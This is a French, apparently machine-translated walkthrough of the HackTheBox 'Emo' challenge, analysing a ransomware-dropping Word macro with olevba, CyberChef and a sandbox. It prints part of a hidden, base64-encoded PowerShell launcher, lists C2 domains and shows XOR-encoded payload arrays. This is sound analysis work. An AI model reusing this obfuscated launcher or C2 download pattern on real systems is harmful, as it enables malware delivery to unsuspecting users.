Nous avons couvert l'analyse d'un document Office contenant un code de macro intégré écrit en Visual Basic. Le document étant censé provoquer une infection par un ransomware, nous avons effectué une analyse statique comprenant l'extraction des chaînes pertinentes, le calcul du hachage MD5, les métadonnées et la révélation de la routine Macro cachée à l'aide d'outils tels qu'olevba. Ensuite, nous avons soumis le hachage à des moteurs d'analyse en ligne tels que VirusTotal et il s'est avéré malveillant dans la mesure où il exécute une commande Powershell qui contacte le serveur c2 pour télécharger d'autres charges utiles. Nous avons également trouvé des instances de cryptage XOR ainsi que la clé XOR qui étaient ensuite utilisées pour déchiffrer des caractères précédemment codés sous forme décimale. Cela faisait partie de Défi HackTheBox Emo.
Obtenir les notes du certificat OSCP
Le cours pratique complet sur les tests d’intrusion d’applications Web
Description du défi
Le ransomware WearRansom vient de se déchaîner dans notre entreprise. Le SOC a retracé l'accès initial à une attaque de phishing, un document Word contenant des macros. Jetez un œil au document et voyez si vous pouvez trouver autre chose sur le malware et peut-être un indicateur.
Faits saillants de la vidéo
Dans cette vidéo, nous prenons la place d'un intervenant en cas d'incident et analysons un document Office Word malveillant contenant un code de macro malveillant qui exécute Powershell qui effectue un cryptage XOR et appelle le serveur de commande et de contrôle pour déposer davantage de charges utiles sur la machine infectée. En gros, nous allons isoler la machine infectée, couper Internet et la cloner pour analyse.
Nous allons donc commencer par une analyse statique des logiciels malveillants en exécutant plusieurs commandes telles que l'extraction des chaînes pertinentes de l'échantillon, le calcul du hachage MD5 et l'extraction des routines de macro à l'aide de certains outils tels que olevba et oledump.py.
La routine Macro contient les commandes et les charges utiles exécutées sur la machine, y compris la commande Powershell. Après l'analyse statique, nous effectuons l'analyse dynamique qui révèle les processus générés, les connexions réseau, les clés de registre modifiées et les événements déclenchés. De plus, vous devez prendre en compte l'horodatage lors de la recherche des événements dans l'Observateur d'événements. Donc, si vous avez ouvert pendant l'analyse dynamique, disons que vous avez ouvert le document malveillant à 19h35, vous devrez utiliser cette heure et filtrer les événements qui ont été déclenchés exactement à l'horodatage spécifié.
Le rapport d'analyse dynamique de cet échantillon est disponible sur n'importe quel.run
Certains des domaines avec lesquels l'échantillon a communiqué sont ci-dessous
da-industrial.htb daprofesional.htb www.outspokenvisions.htb dagranitegiare.htb mobsouk.htb biglaughs.htb ngllogistics.htbVous trouverez ci-dessous la commande Powershell révélée par le rapport d'analyse dynamique.
POwersheLL -windowstyle hidden -ENCOD IABTAFYAIAAgADAAegBYACAAKABbAFQAeQBQAGUAXQAoACIAewAyAH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAGUAJwAsACcAcgBFAEMAdABvAHIAWQAnACwAJwBzAFkAcwB0ACcALAAnAC4ASQBPA
La commande PowerShell ci-dessus sera décodée à l'aide de Cyberchef en utilisant frombase64 et supprimera les octets nuls. Cela vous donnera la charge utile complète à partir de laquelle nous pourrons mettre en évidence les déclarations de variables ci-dessous :
$FN5ggmsH += (186,141,228,182,177,171,229,236,239,239,239,228,181,182,171,229,234,239,239,228)
$FN5ggmsH += (185,179,190,184,229,151,139,157,164,235,177,239,171,183,236,141,128,187,235,134,128,158,177,176,139)
$FN5ggmsH += (183,154,173,128,175,151,238,140,183,162,228,170,173,179,229)
Si nous utilisons chardecode et décimal dans Cyberchef, cela nous donnera une chaîne cryptée avec XOR pour laquelle la clé est 0xdf qui se trouve dans la ligne qui met en évidence ce qui suit dans la charge utile d'origine après l'avoir décodée dans Cyberchef.
+= ([octet][char]${_} -bxor 0xdf )
Vidéo pas à pas
